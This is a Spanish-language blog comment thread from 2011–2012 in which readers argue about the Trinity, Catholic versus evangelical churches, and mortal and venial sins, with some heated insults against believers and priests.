Por cierto, te dejo un torito: Si en la biblia se pide la obediencia a un solo SEÑOR,  nuestro Dios Yahve lógicamente, por qué entonces también se pide que el espíritu santo llegue a nosotros, que hay que seguir las enseñanzas de Jesucristo, si según su doctrina son tres personas distintas, entonces...          Tengo la respuesta, pero a ver que me dices...    y cuando te responda, ten la humildad de tratar de comprender el misterio...

Un abrazo y mil bendiciones se derramen en ti y tu familia, y que el espíritu santo  llegue a ti y te abra el entendimiento para comprender los sagrados misterios que nuestro Dios nos tiene reservados y que rebasan a nuestro humano razonamiento.


Comentarios al correo mushni75@hotmail.com, de preferencia al correo circe_dione@hotmail.com 

Jorge Rodriguez Jorge Rodriguez 06/08/2011 a las 08:23

Que creen...   el pastor no me ha respondido...    Espero respuestas y con bases!!!   No solo palabras de necios sin fundamento.

Jorge Rodriguez Jorge Rodriguez 11/08/2011 a las 06:38

Ya para terminar, convencer al hermano debe fundamentarse  en la enseñanza del amor de Dios, no en la crítica, hay que unir fuerzas para mejorar a este mundo que se esta viendo invadido por el pecado, por la violencia, por el desamor... hace falta que las iglesias unan esfuerzos por que el amor de Cristo llegue a más personas, ¿Cómo vamos a convencer a los no cristianos, a los resentidos si ven que entre nosotros discutimos?   Cambiemos de actitud, construyamos, ya basta de intentar destrozar a las demas religiones, demostremos la ley que rige todo: el amor, principal mandato de nuestro señor Jesucristo.        Con afecto:    Tu Servidor.

Jorge Rodriguez Jorge Rodriguez 11/08/2011 a las 06:44
Bueno despues de leer Los disparates del pastor puedo decir que su frustracion en contra de la iglecia de jesucristo no puede entender en su doctrina varata que el papa guiado por el espiritu santo nos pide cuidar loque Dios nos da y respecto aque los da efforts son esto y lo otro es Por que la jente vusca como vender noticia por que al pastor nadie lo pela y anadie le importa pero al sacerdote si ojala entiendan que solo hay una iglecia y es catolica Mat.18-16 mi iglecia no mis por que el que no conoce a Dios a cualquier garage le llama iglecia
Evaristo Ayala Evaristo Ayala 20/08/2011 a las 07:09

inveciles inveciles los que creen en estas pendejadas, es que acaso no se dan cuenta que es un manual que a todas luces esta diseñado para manipular idiotas? sigan pensando que dios los va a salvar y mas bien piensen quien los va a salvar de estos curas pederastas , degenerados y ladrones

Anónimo Anónimo 22/11/2011 a las 22:35

ex

tatilujan tatilujan 28/11/2011 a las 16:11

ddd

Elmer Sian Elmer Sian 22/12/2011 a las 19:46

hermanos en cristo amemonos unos a los otros no discutamos ni critiquemos de lo que no savemos.............. hablando de los pecados veniales y mortales lean: 1juan 5,17 toda malda es pecado, pero no es pecado que lleva a la muerte........................muchos comentarior erronio cristo fundo una sola iglesia y  ES UNA SANTA CATOLICA Y APOSTOLICA Y el quien ama su iglea ama a gristo crito dijo el quian a ustedes rechaseis a mi me rechasan y el quian a mi me rechasa, rechasa al quien me a enviado asi que queridos hermanos el quien no distinge confunde amemonos porque el quin hablar sin razon y  critica de lo que no save no es de cristiano

Elmer Sian Elmer Sian 22/12/2011 a las 19:59

Oye, los católicos creemos en Yahvé, no en Jehová.

Cecilia Cecilia 28/12/2011 a las 01:05

JESUS DIJO:
ESTOS DIEZ MANDAMIENTOS SE RESUMEN EN DOS:
1. AMARAS A DIOS CON TODO TU CORAZON, CON TODO TUENTENDIMIENTO, CON TODA TU FUERZA Y
2. AMARAS A TU PROJIMO COMO A TI MISMO.

SI AMAMOS A DIOS CON TODAS NUESTRAS FUERZAS, NO PODEMOS PERMITIRNOS CONTAMINAR LA OBRA DE DIOS.
SI AMAMOS A NUESTRO PROJIMO, NO PODEMOS PERMITIRNOS, VIOLARLO, ASECINARLO, SECUESTRARLO, ETC.

ESTOY DE ACUERDO EN QUE ROMA, DESMENUCE DE MANERA TAN CLARA Y CONCISA LOS PECADOS QUE VAN EN CONTRA DE LOS MANDAMIENTOS DE DIOS........... 

reynaesther999 reynaesther999 05/03/2012 a las 14:40

Que puedo entender de este tema, si hasta la Biblia que usan nuestros hermanos evangélicos es la versión Reina Valera es casi por no decir totalmente distinta a la de los Catolicos que es la Biblia de Jerusalen.

ricardo ricardo 08/03/2012 a las 16:38

El Señor fundó sobre Pedro UNA (en singular) UNA SOLA IGLESIA, la Iglesia de su pertenencia, su Iglesia, la Iglesia de la Biblia, la Santa Iglesia Católica, la única. El resto fueron creados y fundados por hombres, entonces yo digo con que potestad y autoridad hablan y hablan de Dios habiendo ellos mismos fundado una iglesia a su medida. Recapaciten y vuelvanse a la unica Iglesia del Señor: la Iglesia Católica.

MARTIN MARTIN 08/03/2012 a las 16:53

Deja tu comentario Los catorce pecados mortales de la iglesia de Roma

Identifícate en OboLog, o crea tu blog gratis si aún no estás registrado.

Avatar de usuario Tu nombre